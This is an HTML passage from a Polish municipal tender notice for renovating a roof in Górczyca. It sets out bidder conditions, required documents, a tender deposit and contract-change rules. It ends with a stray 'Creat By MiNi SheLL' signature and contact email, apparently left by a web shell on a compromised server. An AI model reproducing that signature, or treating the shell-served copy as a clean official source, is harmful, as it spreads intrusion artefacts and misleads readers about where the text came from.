przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1. Sytuacji ekonomicznej lub finansowej. Wykonawca spełni warunek jeżeli wykaże, że:<br/>a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>gospodarczej na kwotę min. 200.000,00 zł (słownie zł: dwieście tysięcy);<br/>b) posiada środki finansowe lub zdolność kredytową, w okresie nie wcześniejszym niż 3<br/>miesiące przed złożeniem oferty na kwotę nie mniejszą niż 150.000,00 zł (słownie zł: sto<br/>pięćdziesiąt tysięcy);<br/>2. Zdolności technicznej lub zawodowej. Wykonawca spełni warunek jeżeli wykaże, że:<br/>a) Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,<br/>wykonał należycie co najmniej 1 świadczenie polegające na modernizacji, remoncie<br/>bądź wymianie pokrycia dachowego, na pokrycie z dachówki ceramicznej, o wartości robót co najmniej 80 000<br/>złotych brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Dokument potwierdzający, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>na sumę gwarancyjną określoną przez Zamawiającego;<br/>2. Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość<br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed złożeniem oferty;<br/>3. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te<br/>zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone – wzór: Załącznik nr 5 do SWZ; Dowodami, o których mowa są<br/>referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w<br/>stanie uzyskać tych dokumentów – inne dokumenty.<br/>4. Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków,<br/>wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że Wykonawca<br/>zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w<br/>szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w<br/>całości wykonania decyzji właściwego organu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Aktualne na dzień składania ofert oświadczenie Wykonawcy o spełnianiu warunków udziału w<br/>postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2 do<br/>SWZ;<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że<br/>Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów, z innym Wykonawca, który złożył odrębną ofertę, ofertę częściową lub wniosek o<br/>dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – wzór załącznik nr 7 do SWZ.<br/>4. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>5. Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w pkt. 1, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – wzór: Załącznik nr<br/>6 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia – dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>zobowiązany jest złożyć wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie będzie<br/>dysponował niezbędnymi zasobami tych podmiotów oraz oświadczenie podmiotu<br/>udostępniającego zasoby o braku podstaw wykluczenia;<br/>4. Oświadczenie Wykonawców wspólnie ubiegających się o zamówienie (jeżeli dotyczy) – wzór:<br/>Załącznik nr 3 do SWZ,<br/>5. Dowód wniesienia wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>1.000,00 (słownie: tysiąc złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>3.1. pieniądzu;<br/>3.2. gwarancjach bankowych;<br/>3.3. gwarancjach ubezpieczeniowych;<br/>3.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Powszechna Kasa<br/>Oszczędności Bank Polski Spółka Akcyjna w Bolesławcu nr rachunku nr 84 1020 2137 0000 9902 0134 9554 z dopiskiem „Wadium - Remont dachu budynku w miejscowości Górczyca nr 28”. UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie<br/>przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji<br/>lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>5.1. musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium<br/>przez Wykonawcę określone w Ustawie;<br/>5.2. z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty<br/>wadium;.<br/>5.3. powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>5.4. termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania<br/>ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5.5. w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego<br/>postępowania;<br/>5.6. beneficjentem poręczenia lub gwarancji jest: Gmina i Miasto Lwówek Śląski 5.7. w<br/>przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Ustawy),<br/>Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych<br/>z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub<br/>nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o<br/>zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Ustawy zostanie odrzucona .<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 Ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W przypadku<br/>wspólnego ubiegania się o udzielenie zamówienia:<br/>1. Wykonawcy są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. Pełnomocnictwo należy załączyć do oferty.<br/>2. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, będzie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których<br/>realizacji te uprawnienia są wymagane.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenia zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>4. W przypadku, o którym mowa w pkt. 2 i 3 Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia zobowiązani są dołączyć do oferty oświadczenie, z którego wynikać będzie, które<br/>roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu składa każdy z<br/>Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełniania<br/>warunków udziału w postępowaniu, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>6. W przypadku wadium wnoszonego w formie poręczeń lub gwarancji w przypadku<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Ustawy),<br/>Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany umowy pod rygorem nieważności wymagają formy pisemnej.<br/>2. Poza przypadkami wymienionymi w art. 455 ust. 1 pkt. 2 lit b i c, pkt. 3 i 4 oraz ust. 2 ustawy z<br/>dnia 11 września 2019 roku Prawo zamówień publicznych (t.j. Dz. U. z 2021 roku, poz. 1129 ze<br/>zm.), przewiduje się możliwość dokonania zmian postanowień umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru Wykonawcy dotyczących:<br/>2.1. przedłużenia terminu zakończenia realizacji przedmiotu umowy o okres trwania przyczyn, z<br/>powodu których będzie zagrożone dotrzymanie terminu zakończenia przedmiotu umowy, w<br/>następujących sytuacjach:<br/>a) jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia<br/>przedmiotu umowy będą następstwem okoliczności, za które odpowiedzialność ponosi<br/>Zamawiający bądź Współudziałowcy, w szczególności będą następstwem nieterminowego<br/>przekazania placu budowy, konieczności zmian w dokumentacji postępowania w zakresie, w<br/>jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie terminu zakończenia<br/>przedmiotu umowy,<br/>b) gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie<br/>robót, w szczególności z powodu technologii realizacji prac określonej: umową, normami lub<br/>innymi przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność<br/>wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi<br/>odpowiedzialność,<br/>c) gdy wystąpi konieczność udzielenia zamówień dodatkowych, które wstrzymują lub opóźniają<br/>realizację przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub<br/>równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do<br/>uniknięcia lub usunięcia tych kolizji,<br/>d) gdy wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez<br/>właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które<br/>Wykonawca ponosi odpowiedzialność,<br/>e) jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczania do ich<br/>wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z<br/>przyczyn niezależnych od Wykonawcy,<br/>f) wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej<br/>postanowieniami.<br/>2.2. technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu<br/>Umowy w następujących sytuacjach:<br/>a) konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem Umowy, przy<br/>zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w<br/>dokumentach postępowania, a wynikających ze stwierdzonych wad tych dokumentów lub<br/>zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie<br/>przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu<br/>umowy,<br/>b) wystąpienia warunków terenu budowy odbiegających w sposób istotny od przyjętych w dokumentach postępowania, w szczególności napotkania niezinwentaryzowanych lub błędnie<br/>zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych,<br/>c) konieczności zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań<br/>technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,<br/>d) wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej<br/>postanowieniami.<br/>CIĄG DALSZY W &#34;Informacje dodatkowe&#34;. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/lwowekslaski w zakładce dedykowanej postępowaniu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> CIĄG DALSZY Z &#34;RODO (obowiązek informacyjny)&#34;: 8. PRAWA PODMIOTÓW DANYCH: -<br/>Posiada Pani/Pan prawo: −na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących; − na podstawie art. 16 RODO prawo do sprostowania Pani/Pana<br/>danych osobowych; − na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w<br/>art. 18 ust. 2 RODO; - nie przysługuje Pani/Panu: − w związku z art. 17 ust. 3 lit. b, d lub e<br/>RODO prawo do usunięcia danych osobowych; − prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20 RODO; − na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO. 9. PRAWO WNIESIENIA SKARGI DO ORGANU<br/>NADZORCZEGO: Przysługuje Pani/Panu również prawo wniesienia skargi w zakresie ochrony<br/>danych osobowych do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych<br/>Osobowych z siedzibą przy ul. Stawki 2, 00-193 Warszawa, tel. 22 531 03 00, jeżeli stwierdzi<br/>Pani/Pan, że przetwarzanie danych osobowych dotyczących Pani/Pana narusza przepisy<br/>RODO.<br/>10. ŹRÓDŁO POCHODZENIA DANYCH OSOBOWYCH: Źródłem pochodzenia Państwa danych<br/>są wszelkie dokumenty składane przez wykonawcę w ramach postępowania o udzielenie<br/>zamówienia publicznego.<br/>11. INFORMACJA O DOWOLNOŚCI LUB OBOWIĄZKU PODANIA DANYCH: obowiązek<br/>podania danych osobowych wynika z ustawy z dnia 11 września 2019r. Prawo zamówień<br/>publicznych i jest warunkiem niezbędnym do wzięcia udziału w postępowaniu o zamówienia<br/>publiczne.<br/>CIĄG DALSZY Z &#34;Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia:&#34;:<br/>2.3. Zmiany osób wymienionych w § 25 niniejszej umowy, przy czym zmiany osób po stronie<br/>Wykonawcy mogą być dokonane wyłącznie pod warunkiem zagwarantowania wykonania<br/>przedmiotu umowy przez osoby zapewniające należyte jej wykonanie, w szczególności<br/>posiadające kwalifikacje wymagane przez Zamawiającego w SWZ.<br/>3. Termin wykonania umowy może zostać wydłużony maksymalnie o czas opóźnienia<br/>spowodowanego okolicznościami określonymi w ust. 2 pkt. 2.1.4. Zmiany, o których mowa w ust.<br/>2, mogą być dokonane przed upływem terminu realizacji niniejszej umowy, na pisemny wniosek<br/>złożony w terminie 7 dni od daty wystąpienia lub powzięcia wiadomości o zaistniałych okolicznościach. Wniosek winien zawierać szczegółowe uzasadnienie, stosownie do zdarzenia<br/>lub okoliczności stanowiących podstawę żądania zmiany.<br/>5. Zamawiający dopuszcza także inne podobne zmiany umowy w przypadku, gdy zmiana<br/>pozostaje w bezpośrednim związku przyczynowo – skutkowym z wystąpieniem danych<br/>okoliczności i nie wykracza poza to co konieczne w celu przeciwdziałania skutkom takiej zmiany<br/>okoliczności.<br/>6. Wszelkie zmiany Umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego<br/>i Wykonawcy w formie pisemnej w drodze aneksu Umowy, pod rygorem nieważności.<br/>7. W razie wątpliwości, przyjmuje się, że nie stanowią zmiany Umowy następujące zmiany:<br/>7.1. danych związanych z obsługą administracyjno-organizacyjną Umowy,<br/>7.2. danych teleadresowych,<br/>7.3. danych rejestrowych.

Creat By MiNi SheLL
Email: jattceo@gmail.com